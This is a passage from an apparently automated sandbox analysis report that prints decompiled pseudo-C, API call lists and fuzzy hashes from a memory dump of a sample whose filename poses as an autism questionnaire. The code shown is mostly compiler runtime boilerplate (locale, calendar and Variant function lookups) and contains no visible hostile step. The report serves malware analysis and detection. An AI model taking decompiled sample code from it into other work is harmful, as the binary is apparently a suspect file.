                                                                                              							 *__ebx =  *__ebx + __edx;
                                                                                              							goto L35;
                                                                                              						case 6:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							__edx =  *(__edx + 4);
                                                                                              							 *__ebx =  *__ebx + __edx;
                                                                                              							goto L35;
                                                                                              						case 7:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							__edx =  *(__edx + 4);
                                                                                              							 *__ebx =  *__ebx + __edx;
                                                                                              							goto L35;
                                                                                              						case 8:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							 *__ebx =  *__ebx + __edx;
                                                                                              							goto L35;
                                                                                              						case 9:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                              							__edx =  *(__edx + 8);
                                                                                              							 *__ecx =  *__ecx + __edx;
                                                                                              							goto L35;
                                                                                              						case 0xa:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                              							__edx =  *(__edx + 8);
                                                                                              							 *__ecx =  *__ecx + __edx;
                                                                                              							goto L35;
                                                                                              						case 0xb:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                              							__edx =  *(__edx + 8);
                                                                                              							 *__ecx =  *__ecx + __edx;
                                                                                              							goto L35;
                                                                                              						case 0xc:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                              							 *__ecx =  *__ecx + __edx;
                                                                                              							goto L35;
                                                                                              					}
                                                                                              				} else {
                                                                                              					goto L2;
                                                                                              				}
                                                                                              				do {
                                                                                              					L2:
                                                                                              					 *_t96 =  *_t96 +  *_v8;
                                                                                              					 *_t106 =  *_t106 + _v8[1];
                                                                                              					 *_t108 =  *_t108 + _v8[2];
                                                                                              					 *_t96 =  *_t96 -  *_t108;
                                                                                              					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                                                              					 *_t108 =  *_t108 +  *_t106;
                                                                                              					 *_t106 =  *_t106 -  *_t96;
                                                                                              					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
                                                                                              					 *_t96 =  *_t96 +  *_t108;
                                                                                              					 *_t108 =  *_t108 -  *_t106;
                                                                                              					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
                                                                                              					 *_t106 =  *_t106 +  *_t96;
                                                                                              					 *_t96 =  *_t96 -  *_t108;
                                                                                              					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
                                                                                              					 *_t108 =  *_t108 +  *_t106;
                                                                                              					 *_t106 =  *_t106 -  *_t96;
                                                                                              					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
                                                                                              					 *_t96 =  *_t96 +  *_t108;
                                                                                              					 *_t108 =  *_t108 -  *_t106;
                                                                                              					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
                                                                                              					 *_t106 =  *_t106 +  *_t96;
                                                                                              					_t109 = _t109 - 0xc;
                                                                                              					_v8 = _v8 + 0xc;
                                                                                              				} while (_t109 > 0xc);
                                                                                              				goto L3;
                                                                                              			}














                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                              • Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
                                                                                              • Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                              • Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                              • Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
                                                                                              • Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                              • Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                              • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                                              • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                              • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00427874() {
                                                                                              				struct HINSTANCE__* _v8;
                                                                                              				intOrPtr _t46;
                                                                                              				void* _t91;
                                                                                              
                                                                                              				_v8 = GetModuleHandleW(L"oleaut32.dll");
                                                                                              				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
                                                                                              				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
                                                                                              				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
                                                                                              				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
                                                                                              				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
                                                                                              				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
                                                                                              				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
                                                                                              				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
                                                                                              				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
                                                                                              				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
                                                                                              				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
                                                                                              				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
                                                                                              				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
                                                                                              				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
                                                                                              				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
                                                                                              				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
                                                                                              				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
                                                                                              				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
                                                                                              				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
                                                                                              				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
                                                                                              				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
                                                                                              				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
                                                                                              				 *0x4c1188 = _t46;
                                                                                              				return _t46;
                                                                                              			}







                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                                                • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                              • API String ID: 1646373207-1918263038
                                                                                              • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                              • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                                              • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                              • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				signed int _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr* _t32;
                                                                                              				signed int _t53;
                                                                                              				signed int _t56;
                                                                                              				signed int _t71;
                                                                                              				signed int _t78;
                                                                                              				signed int* _t82;
                                                                                              				signed int _t85;
                                                                                              				void* _t93;
                                                                                              				signed int _t94;
                                                                                              				signed int _t95;
                                                                                              				signed int _t98;
                                                                                              				signed int _t99;
                                                                                              				void* _t105;
                                                                                              				intOrPtr _t106;
                                                                                              				signed int _t109;
                                                                                              				intOrPtr _t116;
                                                                                              				intOrPtr _t117;
                                                                                              				void* _t131;
                                                                                              				void* _t132;
                                                                                              				signed int _t134;
                                                                                              				void* _t136;
                                                                                              				void* _t137;
                                                                                              				void* _t139;
                                                                                              				void* _t140;
                                                                                              				intOrPtr _t141;
                                                                                              				void* _t142;
                                                                                              				long long _t161;
                                                                                              
                                                                                              				_t161 = __fp0;
                                                                                              				_t126 = __edi;
                                                                                              				_t109 = __edx;
                                                                                              				_t139 = _t140;
                                                                                              				_t141 = _t140 + 0xfffffff0;
                                                                                              				_push(__edi);
                                                                                              				_v12 = 0;
                                                                                              				_v8 = __edx;
                                                                                              				_t93 = __eax;
                                                                                              				_push(_t139);
                                                                                              				_push(0x41ea61);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t141;
                                                                                              				_t32 =  *0x4ba590; // 0x4bb8f8
                                                                                              				_t144 =  *_t32;
                                                                                              				if( *_t32 == 0) {
                                                                                              					E0040554C(0x1a);
                                                                                              				}
                                                                                              				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
                                                                                              				_push(_t139);
                                                                                              				_push(0x41ea44);
                                                                                              				_push( *[fs:edx]);
                                                                                              				 *[fs:edx] = _t141;
                                                                                              				 *0x4be7dc = 0;
                                                                                              				_push(0);
                                                                                              				E00409C00();
                                                                                              				_t142 = _t141 + 4;
                                                                                              				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
                                                                                              				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
                                                                                              				if(_t127 + 0xfffffffd - 3 >= 0) {
                                                                                              					__eflags = _t127 - 0xffffffffffffffff;
                                                                                              					if(_t127 - 0xffffffffffffffff < 0) {
                                                                                              						 *0x4be7dc = 1;
                                                                                              						_push(1);
                                                                                              						E00409C00();
                                                                                              						_t142 = _t142 + 4;
                                                                                              						E00407E00( *0x4be7e0, L"B.C.");
                                                                                              						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
                                                                                              						_t71 =  *0x4be7e0;
                                                                                              						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
                                                                                              						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
                                                                                              						E0041C1C4(1, 1, 1, __eflags, _t161);
                                                                                              						_v20 = E00405790();
                                                                                              						_v16 = 1;
                                                                                              						asm("fild qword [ebp-0x10]");
                                                                                              						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
                                                                                              						asm("wait");
                                                                                              						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
                                                                                              						_t78 =  *0x4be7e0;
                                                                                              						__eflags = _t78;
                                                                                              						if(_t78 != 0) {
                                                                                              							_t82 = _t78 - 4;
                                                                                              							__eflags = _t82;
                                                                                              							_t78 =  *_t82;
                                                                                              						}
                                                                                              						_t134 = _t78 - 1;
                                                                                              						__eflags = _t134;
                                                                                              						if(_t134 > 0) {
                                                                                              							_t98 = 1;
                                                                                              							do {
                                                                                              								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
                                                                                              								_t98 = _t98 + 1;
                                                                                              								_t134 = _t134 - 1;
                                                                                              								__eflags = _t134;
                                                                                              							} while (_t134 != 0);
                                                                                              						}
                                                                                              						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
                                                                                              					}
                                                                                              				} else {
                                                                                              					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
                                                                                              					_t85 =  *0x4be7e0;
                                                                                              					if(_t85 != 0) {
                                                                                              						_t85 =  *(_t85 - 4);
                                                                                              					}
                                                                                              					_t136 = _t85 - 1;
                                                                                              					if(_t136 >= 0) {
                                                                                              						_t137 = _t136 + 1;
                                                                                              						_t99 = 0;
                                                                                              						do {
                                                                                              							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
                                                                                              							_t99 = _t99 + 1;
                                                                                              							_t137 = _t137 - 1;
                                                                                              						} while (_t137 != 0);
                                                                                              					}
                                                                                              					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
                                                                                              				}
                                                                                              				_t94 =  *0x4be7e0;
                                                                                              				if(_t94 != 0) {
                                                                                              					_t94 =  *(_t94 - 4);
                                                                                              				}
                                                                                              				_push(_t94);
                                                                                              				E00409C00();
                                                                                              				_t53 =  *0x4be7e0;
                                                                                              				if(_t53 != 0) {
                                                                                              					_t53 =  *(_t53 - 4);
                                                                                              				}
                                                                                              				_t131 = _t53 - 1;
                                                                                              				if(_t131 >= 0) {
                                                                                              					_t132 = _t131 + 1;
                                                                                              					_t95 = 0;
                                                                                              					do {
                                                                                              						_t127 = _t95 + _t95 * 2;
                                                                                              						_t106 =  *0x416e18; // 0x416e1c
                                                                                              						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
                                                                                              						_t95 = _t95 + 1;
                                                                                              						_t132 = _t132 - 1;
                                                                                              					} while (_t132 != 0);
                                                                                              				}
                                                                                              				_t116 =  *0x41e600; // 0x41e604
                                                                                              				E00409D24(0x4be7e0, _t116);
                                                                                              				_t56 =  *0x4be7e0;
                                                                                              				if(_t56 != 0) {
                                                                                              					_t56 =  *(_t56 - 4);
                                                                                              				}
                                                                                              				 *0x4be7dc = _t56;
                                                                                              				_pop(_t117);
                                                                                              				_pop(_t105);
                                                                                              				 *[fs:eax] = _t117;
                                                                                              				_push(0x41ea4b);
                                                                                              				return E00406868( *0x4be7e4, _t105, _t127);
                                                                                              			}



































                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CalendarEnumInfoLocaleThread
                                                                                              • String ID: B.C.$ToA$K$K$K
                                                                                              • API String ID: 683597275-1724967715
                                                                                              • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                              • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                                              • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                              • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A250() {
                                                                                              				signed int _t2;
                                                                                              				_Unknown_base(*)()* _t8;
                                                                                              
                                                                                              				InitializeCriticalSection(0x4bdc10);
                                                                                              				 *0x4bdc28 = 0x7f;
                                                                                              				_t2 = GetVersion() & 0x000000ff;
                                                                                              				 *0x4bdc0c = _t2 - 6 >= 0;
                                                                                              				if( *0x4bdc0c != 0) {
                                                                                              					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
                                                                                              					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
                                                                                              					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
                                                                                              					 *0x4bdc08 = _t8;
                                                                                              					return _t8;
                                                                                              				}
                                                                                              				return _t2;
                                                                                              			}






                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                              • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                              • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                              • API String ID: 74573329-1403180336
                                                                                              • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                              • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                                              • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                              • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				char _v28;
                                                                                              				char _v32;
                                                                                              				char _v36;
                                                                                              				char _v40;
                                                                                              				char _v44;
                                                                                              				char _v48;
                                                                                              				char _v52;
                                                                                              				char _v56;
                                                                                              				char _v60;
                                                                                              				int _t55;
                                                                                              				void* _t121;
                                                                                              				void* _t128;
                                                                                              				void* _t151;
                                                                                              				void* _t152;
                                                                                              				intOrPtr _t172;
                                                                                              				intOrPtr _t204;
                                                                                              				signed short _t212;
                                                                                              				int _t214;
                                                                                              				intOrPtr _t216;
                                                                                              				intOrPtr _t217;
                                                                                              				void* _t224;
                                                                                              
                                                                                              				_t224 = __fp0;
                                                                                              				_t211 = __edi;
                                                                                              				_t216 = _t217;
                                                                                              				_t152 = 7;
                                                                                              				do {
                                                                                              					_push(0);
                                                                                              					_push(0);
                                                                                              					_t152 = _t152 - 1;
                                                                                              				} while (_t152 != 0);
                                                                                              				_push(__edi);
                                                                                              				_t151 = __edx;
                                                                                              				_t214 = __eax;
                                                                                              				_push(_t216);
                                                                                              				_push(0x41e391);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t217;
                                                                                              				_t55 = IsValidLocale(__eax, 1);
                                                                                              				_t219 = _t55;
                                                                                              				if(_t55 == 0) {
                                                                                              					_t214 = GetThreadLocale();
                                                                                              				}
                                                                                              				_t172 =  *0x416f50; // 0x416f54
                                                                                              				E00409D24(_t151 + 0xbc, _t172);
                                                                                              				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
                                                                                              				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
                                                                                              				E0041E55C(_t214, _t151, _t151, _t211, _t214);
                                                                                              				E0041E034(_t214, 0, 0x14,  &_v20);
                                                                                              				E00407E00(_t151, _v20);
                                                                                              				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
                                                                                              				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                              				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
                                                                                              				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                              				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
                                                                                              				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
                                                                                              				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
                                                                                              				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                              				_t212 = E0041E080(_t214, 0x2f, 0x1d);
                                                                                              				 *(_t151 + 6) = _t212;
                                                                                              				_push(_t212);
                                                                                              				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
                                                                                              				E00407E00(_t151 + 0xc, _v36);
                                                                                              				_push( *(_t151 + 6) & 0x0000ffff);
                                                                                              				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
                                                                                              				E00407E00(_t151 + 0x10, _v40);
                                                                                              				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
                                                                                              				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
                                                                                              				E00407E00(_t151 + 0x14, _v44);
                                                                                              				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
                                                                                              				E00407E00(_t151 + 0x18, _v48);
                                                                                              				E00407A20( &_v12);
                                                                                              				E00407A20( &_v16);
                                                                                              				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
                                                                                              				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                              				_t220 = _t121;
                                                                                              				if(_t121 != 0) {
                                                                                              					E00407E48( &_v8, 0x41e438);
                                                                                              				} else {
                                                                                              					E00407E48( &_v8, 0x41e428);
                                                                                              				}
                                                                                              				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
                                                                                              				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
                                                                                              				_t221 = _t128;
                                                                                              				if(_t128 == 0) {
                                                                                              					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
                                                                                              					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
                                                                                              						E00407E48( &_v12, L"AMPM ");
                                                                                              					} else {
                                                                                              						E00407E48( &_v16, L" AMPM");
                                                                                              					}
                                                                                              				}
                                                                                              				_push(_v12);
                                                                                              				_push(_v8);
                                                                                              				_push(":mm");
                                                                                              				_push(_v16);
                                                                                              				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
                                                                                              				_push(_v12);
                                                                                              				_push(_v8);
                                                                                              				_push(L":mm:ss");
                                                                                              				_push(_v16);
                                                                                              				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
                                                                                              				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
                                                                                              				 *((short*)(_t151 + 0xc4)) = 0x32;
                                                                                              				_pop(_t204);
                                                                                              				 *[fs:eax] = _t204;
                                                                                              				_push(0x41e398);
                                                                                              				return E00407A80( &_v60, 0xe);
                                                                                              			}






























                                                                                              APIs
                                                                                              • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                                              • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                                                • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                                • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$Info$ThreadValid
